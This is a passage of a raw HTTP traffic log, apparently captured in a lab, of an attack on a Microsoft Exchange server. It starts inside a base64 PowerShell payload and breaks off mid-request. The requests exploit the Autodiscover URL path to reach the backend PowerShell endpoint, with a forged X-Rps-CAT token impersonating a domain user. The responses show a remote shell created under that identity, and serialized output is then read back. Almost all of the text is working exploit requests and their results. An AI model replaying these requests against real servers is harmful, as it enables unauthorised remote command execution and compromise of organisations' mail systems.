VM+CiAgICAgICAgICAgICAgICAgICAgICA8UyBOPSJUIj5TeXN0ZW0uU3RyaW5nPC9TPgogICAgICAgICAgICAgICAgICAgICAgPFMgTj0iViI+QzpcZGV2XGtpdGNoZW4tdmFncmFudDwvUz4KICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgIDwvRW4+CiAgICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICAgIDxJMzIgTj0iS2V5Ij44PC9JMzI+CiAgICAgICAgICAgICAgICAgIDxPYmogTj0iVmFsdWUiIFJlZklkPSIxMCI+CiAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgPFMgTj0iVCI+U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5Ib3N0LlNpemU8L1M+CiAgICAgICAgICAgICAgICAgICAgICA8T2JqIE49IlYiIFJlZklkPSIxMSI+CiAgICAgICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgICAgICA8STMyIE49IndpZHRoIj4xOTk8L0kzMj4KICAgICAgICAgICAgICAgICAgICAgICAgICA8STMyIE49ImhlaWdodCI+NTI8L0kzMj4KICAgICAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgICAgIDwvTVM+CiAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgICAgIDxFbj4KICAgICAgICAgICAgICAgICAgPEkzMiBOPSJLZXkiPjc8L0kzMj4KICAgICAgICAgICAgICAgICAgPE9iaiBOPSJWYWx1ZSIgUmVmSWQ9IjEyIj4KICAgICAgICAgICAgICAgICAgICA8TVM+CiAgICAgICAgICAgICAgICAgICAgICA8UyBOPSJUIj5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkhvc3QuU2l6ZTwvUz4KICAgICAgICAgICAgICAgICAgICAgIDxPYmogTj0iViIgUmVmSWQ9IjEzIj4KICAgICAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0id2lkdGgiPjgwPC9JMzI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgPEkzMiBOPSJoZWlnaHQiPjUyPC9JMzI+CiAgICAgICAgICAgICAgICAgICAgICAgIDwvTVM+CiAgICAgICAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgIDwvRW4+CiAgICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICAgIDxJMzIgTj0iS2V5Ij42PC9JMzI+CiAgICAgICAgICAgICAgICAgIDxPYmogTj0iVmFsdWUiIFJlZklkPSIxNCI+CiAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgPFMgTj0iVCI+U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5Ib3N0LlNpemU8L1M+CiAgICAgICAgICAgICAgICAgICAgICA8T2JqIE49IlYiIFJlZklkPSIxNSI+CiAgICAgICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgICAgICA8STMyIE49IndpZHRoIj44MDwvSTMyPgogICAgICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0iaGVpZ2h0Ij4yNTwvSTMyPgogICAgICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICA8L0VuPgogICAgICAgICAgICAgICAgPEVuPgogICAgICAgICAgICAgICAgICA8STMyIE49IktleSI+NTwvSTMyPgogICAgICAgICAgICAgICAgICA8T2JqIE49IlZhbHVlIiBSZWZJZD0iMTYiPgogICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgIDxTIE49IlQiPlN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uSG9zdC5TaXplPC9TPgogICAgICAgICAgICAgICAgICAgICAgPE9iaiBOPSJWIiBSZWZJZD0iMTciPgogICAgICAgICAgICAgICAgICAgICAgICA8TVM+CiAgICAgICAgICAgICAgICAgICAgICAgICAgPEkzMiBOPSJ3aWR0aCI+MjUwPC9JMzI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgPEkzMiBOPSJoZWlnaHQiPjk5OTk8L0kzMj4KICAgICAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgICAgIDwvTVM+CiAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgICAgIDxFbj4KICAgICAgICAgICAgICAgICAgPEkzMiBOPSJLZXkiPjQ8L0kzMj4KICAgICAgICAgICAgICAgICAgPE9iaiBOPSJWYWx1ZSIgUmVmSWQ9IjE4Ij4KICAgICAgICAgICAgICAgICAgICA8TVM+CiAgICAgICAgICAgICAgICAgICAgICA8UyBOPSJUIj5TeXN0ZW0uSW50MzI8L1M+CiAgICAgICAgICAgICAgICAgICAgICA8STMyIE49IlYiPjI1PC9JMzI+CiAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICA8L0VuPgogICAgICAgICAgICAgICAgPEVuPgogICAgICAgICAgICAgICAgICA8STMyIE49IktleSI+MzwvSTMyPgogICAgICAgICAgICAgICAgICA8T2JqIE49IlZhbHVlIiBSZWZJZD0iMTkiPgogICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgIDxTIE49IlQiPlN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uSG9zdC5Db29yZGluYXRlczwvUz4KICAgICAgICAgICAgICAgICAgICAgIDxPYmogTj0iViIgUmVmSWQ9IjIwIj4KICAgICAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0ieCI+MDwvSTMyPgogICAgICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0ieSI+OTk3NDwvSTMyPgogICAgICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICA8L0VuPgogICAgICAgICAgICAgICAgPEVuPgogICAgICAgICAgICAgICAgICA8STMyIE49IktleSI+MjwvSTMyPgogICAgICAgICAgICAgICAgICA8T2JqIE49IlZhbHVlIiBSZWZJZD0iMjEiPgogICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgIDxTIE49IlQiPlN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uSG9zdC5Db29yZGluYXRlczwvUz4KICAgICAgICAgICAgICAgICAgICAgIDxPYmogTj0iViIgUmVmSWQ9IjIyIj4KICAgICAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0ieCI+MDwvSTMyPgogICAgICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0ieSI+OTk5ODwvSTMyPgogICAgICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICA8L0VuPgogICAgICAgICAgICAgICAgPEVuPgogICAgICAgICAgICAgICAgICA8STMyIE49IktleSI+MTwvSTMyPgogICAgICAgICAgICAgICAgICA8T2JqIE49IlZhbHVlIiBSZWZJZD0iMjMiPgogICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgIDxTIE49IlQiPlN5c3RlbS5Db25zb2xlQ29sb3I8L1M+CiAgICAgICAgICAgICAgICAgICAgICA8STMyIE49IlYiPjA8L0kzMj4KICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgIDwvRW4+CiAgICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICAgIDxJMzIgTj0iS2V5Ij4wPC9JMzI+CiAgICAgICAgICAgICAgICAgIDxPYmogTj0iVmFsdWUiIFJlZklkPSIyNCI+CiAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgPFMgTj0iVCI+U3lzdGVtLkNvbnNvbGVDb2xvcjwvUz4KICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0iViI+NzwvSTMyPgogICAgICAgICAgICAgICAgICAgIDwvTVM+CiAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgICA8L0RDVD4KICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICA8L01TPgogICAgICAgIDwvT2JqPgogICAgICAgIDxCIE49Il9pc0hvc3ROdWxsIj5mYWxzZTwvQj4KICAgICAgICA8QiBOPSJfaXNIb3N0VUlOdWxsIj5mYWxzZTwvQj4KICAgICAgICA8QiBOPSJfaXNIb3N0UmF3VUlOdWxsIj5mYWxzZTwvQj4KICAgICAgICA8QiBOPSJfdXNlUnVuc3BhY2VIb3N0Ij5mYWxzZTwvQj4KICAgICAgPC9NUz4KICAgIDwvT2JqPgogIDwvTVM+CjwvT2JqPgo=</creationXml></rsp:Shell></env:Body></env:Envelope> #################### # Response: #################### HTTP/1.1 200 OK Cache-Control: private Content-Type: application/soap+xml;charset=UTF-8 Server: Microsoft-IIS/10.0 request-id: b3f69361-b6d4-487a-8b9d-f0f17d74c26a X-CalculatedBETarget: win-bpid95acq7e.exchg.lan X-AspNet-Version: 4.0.30319 Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:43 GMT; path=/Autodiscover; secure; HttpOnly X-Powered-By: ASP.NET X-FEServer: WIN-BPID95ACQ7E Date: Wed, 18 Aug 2021 19:14:43 GMT Content-Length: 1640 <s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.xmlsoap.org/ws/2004/09/transfer/CreateResponse</a:Action><a:MessageID>uuid:26B96A37-A801-4474-91B0-8FB1FF064AFB</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:1FA7A332-BF9E-41D5-A0A6-DB3445500A88</a:RelatesTo></s:Header><s:Body><x:ResourceCreated><a:Address>http://127.0.0.1/PowerShell/</a:Address><a:ReferenceParameters><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><w:SelectorSet><w:Selector Name="ShellId">F707CFC1-5849-4529-97C7-F492318D859C</w:Selector></w:SelectorSet></a:ReferenceParameters></x:ResourceCreated><rsp:Shell xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell"><rsp:ShellId>F707CFC1-5849-4529-97C7-F492318D859C</rsp:ShellId><rsp:ResourceUri>http://schemas.microsoft.com/powershell/Microsoft.Exchange</rsp:ResourceUri><rsp:Owner>smcintyre@exchg.lan</rsp:Owner><rsp:ClientIP>fe80::d932:1cb5:5d16:a750%3</rsp:ClientIP><rsp:IdleTimeOut>PT900.000S</rsp:IdleTimeOut><rsp:InputStreams>stdin pr</rsp:InputStreams><rsp:OutputStreams>stdout</rsp:OutputStreams><rsp:ShellRunTime>P0DT0H0M0S</rsp:ShellRunTime><rsp:ShellInactivity>P0DT0H0M0S</rsp:ShellInactivity></rsp:Shell></s:Body></s:Envelope> #################### # Request: #################### POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1 Host: 192.168.159.42 User-Agent: Mozilla/5.0 Cookie: none Accept: */* Cache-Control: no-cache Connection: keep-alive Content-Type: application/soap+xml;charset=UTF-8 Content-Length: 1765 <?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:FE83DD69-8F47-4213-9B12-7D873E9081C3</a:MessageID><p:SessionId mustUnderstand="false">uuid:D15EBBDD-EFE9-4368-9C74-DB2A170DBF24</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive</a:Action><w:OptionSet><w:Option Name="WSMAN_CMDSHELL_OPTION_KEEPALIVE">TRUE</w:Option></w:OptionSet><w:SelectorSet><w:Selector Name="ShellId">F707CFC1-5849-4529-97C7-F492318D859C</w:Selector></w:SelectorSet></env:Header><env:Body><rsp:Receive><rsp:DesiredStream>stdout</rsp:DesiredStream></rsp:Receive></env:Body></env:Envelope> #################### # Response: #################### HTTP/1.1 200 OK Cache-Control: private Content-Type: application/soap+xml;charset=UTF-8 Server: Microsoft-IIS/10.0 request-id: 1a9d8a7f-9222-4ae7-83d8-7eb143495d3b X-CalculatedBETarget: win-bpid95acq7e.exchg.lan X-AspNet-Version: 4.0.30319 Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:44 GMT; path=/Autodiscover; secure; HttpOnly X-Powered-By: ASP.NET X-FEServer: WIN-BPID95ACQ7E Date: Wed, 18 Aug 2021 19:14:43 GMT Content-Length: 1062 <s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/ReceiveResponse</a:Action><a:MessageID>uuid:6887745C-4AFD-44DB-9F30-0ECCBA31B7D5</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:FE83DD69-8F47-4213-9B12-7D873E9081C3</a:RelatesTo></s:Header><s:Body><rsp:ReceiveResponse><rsp:Stream Name="stdout">AAAAAAAAAUkAAAAAAAAAAAMAAADKAQAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAO+7vzxPYmogUmVmSWQ9IjAiPjxNUz48VmVyc2lvbiBOPSJwcm90b2NvbHZlcnNpb24iPjIuMzwvVmVyc2lvbj48VmVyc2lvbiBOPSJQU1ZlcnNpb24iPjIuMDwvVmVyc2lvbj48VmVyc2lvbiBOPSJTZXJpYWxpemF0aW9uVmVyc2lvbiI+MS4xLjAuMTwvVmVyc2lvbj48L01TPjwvT2JqPg==</rsp:Stream></rsp:ReceiveResponse></s:Body></s:Envelope> #################### # Request: #################### POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1 Host: 192.168.159.42 User-Agent: Mozilla/5.0 Cookie: none Accept: */* Cache-Control: no-cache Connection: keep-alive Content-Type: application/soap+xml;charset=UTF-8 Content-Length: 1765 <?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:841C11C9-E852-4B9B-BC34-B0122E7A70DD</a:MessageID><p:SessionId mustUnderstand="false">uuid:D15EBBDD-EFE9-4368-9C74-DB2A170DBF24</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive</a:Action><w:OptionSet><w:Option Name="WSMAN_CMDSHELL_OPTION_KEEPALIVE">TRUE</w:Option></w:OptionSet><w:SelectorSet><w:Selector Name="ShellId">F707CFC1-5849-4529-97C7-F492318D859C</w:Selector></w:SelectorSet></env:Header><env:Body><rsp:Receive><rsp:DesiredStream>stdout</rsp:DesiredStream></rsp:Receive></env:Body></env:Envelope> #################### # Response: #################### HTTP/1.1 200 OK Cache-Control: private Content-Type: application/soap+xml;charset=UTF-8 Server: Microsoft-IIS/10.0 request-id: 4223ab81-dd50-480b-b8fa-6f49ab626c6e X-CalculatedBETarget: win-bpid95acq7e.exchg.lan X-AspNet-Version: 4.0.30319 Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:44 GMT; path=/Autodiscover; secure; HttpOnly X-Powered-By: ASP.NET X-FEServer: WIN-BPID95ACQ7E Date: Wed, 18 Aug 2021 19:14:43 GMT Content-Length: 2694 <s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/ReceiveResponse</a:Action><a:MessageID>uuid:D275C8B9-B25B-42AA-8009-E7DFDBA23975</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:841C11C9-E852-4B9B-BC34-B0122E7A70DD</a:RelatesTo></s:Header><s:Body><rsp:ReceiveResponse><rsp:Stream Name="stdout">AAAAAAAAAUoAAAAAAAAAAAMAAAWSAQAAAAkQAgC6YAPcjEr4Tq3xAS9ylt/5AAAAAAAAAAAAAAAAAAAAAO+7vzxPYmogUmVmSWQ9IjAiPjxNUz48T2JqIE49IkFwcGxpY2F0aW9uUHJpdmF0ZURhdGEiIFJlZklkPSIxIj48VE4gUmVmSWQ9IjAiPjxUPlN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUFNQcmltaXRpdmVEaWN0aW9uYXJ5PC9UPjxUPlN5c3RlbS5Db2xsZWN0aW9ucy5IYXNodGFibGU8L1Q+PFQ+U3lzdGVtLk9iamVjdDwvVD48L1ROPjxEQ1Q+PEVuPjxTIE49IktleSI+U3VwcG9ydGVkVmVyc2lvbnM8L1M+PFMgTj0iVmFsdWUiPjE1LjEuMjE3Ni4yPC9TPjwvRW4+PEVuPjxTIE49IktleSI+SW1wbGljaXRSZW1vdGluZzwvUz48T2JqIE49IlZhbHVlIiBSZWZJZD0iMiI+PFROUmVmIFJlZklkPSIwIiAvPjxEQ1Q+PEVuPjxTIE49IktleSI+SGFzaDwvUz48STMyIE49IlZhbHVlIj4tNDEzODg2MjU1PC9JMzI+PC9Fbj48L0RDVD48L09iaj48L0VuPjxFbj48UyBOPSJLZXkiPlBTVmVyc2lvblRhYmxlPC9TPjxPYmogTj0iVmFsdWUiIFJlZklkPSIzIj48VE5SZWYgUmVmSWQ9IjAiIC8+PERDVD48RW4+PFMgTj0iS2V5Ij5QU1ZlcnNpb248L1M+PFZlcnNpb24gTj0iVmFsdWUiPjUuMS4xNDM5My4zODY2PC9WZXJzaW9uPjwvRW4+PEVuPjxTIE49IktleSI+UFNFZGl0aW9uPC9TPjxTIE49IlZhbHVlIj5EZXNrdG9wPC9TPjwvRW4+PEVuPjxTIE49IktleSI+UFNDb21wYXRpYmxlVmVyc2lvbnM8L1M+PE9iaiBOPSJWYWx1ZSIgUmVmSWQ9IjQiPjxUTiBSZWZJZD0iMSI+PFQ+U3lzdGVtLlZlcnNpb25bXTwvVD48VD5TeXN0ZW0uQXJyYXk8L1Q+PFQ+U3lzdGVtLk9iamVjdDwvVD48L1ROPjxMU1Q+PFZlcnNpb24+MS4wPC9WZXJzaW9uPjxWZXJzaW9uPjIuMDwvVmVyc2lvbj48VmVyc2lvbj4zLjA8L1ZlcnNpb24+PFZlcnNpb24+NC4wPC9WZXJzaW9uPjxWZXJzaW9uPjUuMDwvVmVyc2lvbj48VmVyc2lvbj41LjEuMTQzOTMuMzg2NjwvVmVyc2lvbj48L0xTVD48L09iaj48L0VuPjxFbj48UyBOPSJLZXkiPkNMUlZlcnNpb248L1M+PFZlcnNpb24gTj0iVmFsdWUiPjQuMC4zMDMxOS40MjAwMDwvVmVyc2lvbj48L0VuPjxFbj48UyBOPSJLZXkiPkJ1aWxkVmVyc2lvbjwvUz48VmVyc2lvbiBOPSJWYWx1ZSI+MTAuMC4xNDM5My4zODY2PC9WZXJzaW9uPjwvRW4+PEVuPjxTIE49IktleSI+V1NNYW5TdGFja1ZlcnNpb248L1M+PFZlcnNpb24gTj0iVmFsdWUiPjMuMDwvVmVyc2lvbj48L0VuPjxFbj48UyBOPSJLZXkiPlBTUmVtb3RpbmdQcm90b2NvbFZlcnNpb248L1M+PFZlcnNpb24gTj0iVmFsdWUiPjIuMzwvVmVyc2lvbj48L0VuPjxFbj48UyBOPSJLZXkiPlNlcmlhbGl6YXRpb25WZXJzaW9uPC9TPjxWZXJzaW9uIE49IlZhbHVlIj4xLjEuMC4xPC9WZXJzaW9uPjwvRW4+PC9EQ1Q+PC9PYmo+PC9Fbj48L0RDVD48L09iaj48L01TPjwvT2JqPg==</rsp:Stream></rsp:ReceiveResponse></s:Body></s:Envelope> #################### # Request: #################### POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1 Host: 192.168.159.42 User-Agent: Mozilla/5.0 Cookie: none Accept: */* Cache-Control: no-cache Connection: keep-alive Content-Type: application/soap+xml;charset=UTF-8 Content-Length: 1765 <?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:B5A2269A-C1FA-460C-82C5-0E3433F33BA1</a:MessageID><p:SessionId mustUnderstand="false">uuid:D15EBBDD-EFE9-4368-9C74-DB2A170DBF24</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive</a:Action><w:OptionSet><w:Option Name="WSMAN_CMDSHELL_OPTION_KEEPALIVE">TRUE</w:Option></w:OptionSet><w:SelectorSet><w:Selector Name="ShellId">F707CFC1-5849-4529-97C7-F492318D859C</w:Selector></w:SelectorSet></env:Header><env:Body><rsp:Receive><rsp:DesiredStream>stdout</rsp:DesiredStream></rsp:Receive></env:Body></env:Envelope> #################### # Response: #################### HTTP/1.1 200 OK Cache-Control: private Content-Type: application/soap+xml;charset=UTF-8 Server: Microsoft-IIS/10.0 request-id: 39938043-99f3-4786-b7be-b8d5797ade01 X-CalculatedBETarget: win-bpid95acq7e.exchg.lan X-AspNet-Version: 4.0.30319 Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:44 GMT; path=/Autodiscover; secure; HttpOnly X-Powered-By: ASP.NET X-FEServer: WIN-BPID95ACQ7E Date: Wed, 18 Aug 2021 19:14:43 GMT Content-Length: 930 <s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/ReceiveResponse</a:Action><a:MessageID>uuid:894AD1DE-0B80-4F9D-B3F0-D69EF16EA3F6</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:B5A2269A-C1FA-460C-82C5-0E3433F33BA1</a:RelatesTo></s:Header><s:Body><rsp:ReceiveResponse><rsp:Stream Name="stdout">AAAAAAAAAUsAAAAAAAAAAAMAAABnAQAAAAUQAgC6YAPcjEr4Tq3xAS9ylt/5AAAAAAAAAAAAAAAAAAAAAO+7vzxPYmogUmVmSWQ9IjAiPjxNUz48STMyIE49IlJ1bnNwYWNlU3RhdGUiPjI8L0kzMj48L01TPjwvT2JqPg==</rsp:Stream></rsp:ReceiveResponse></s:Body></s:Envelope> #################### # Request: #################### POST 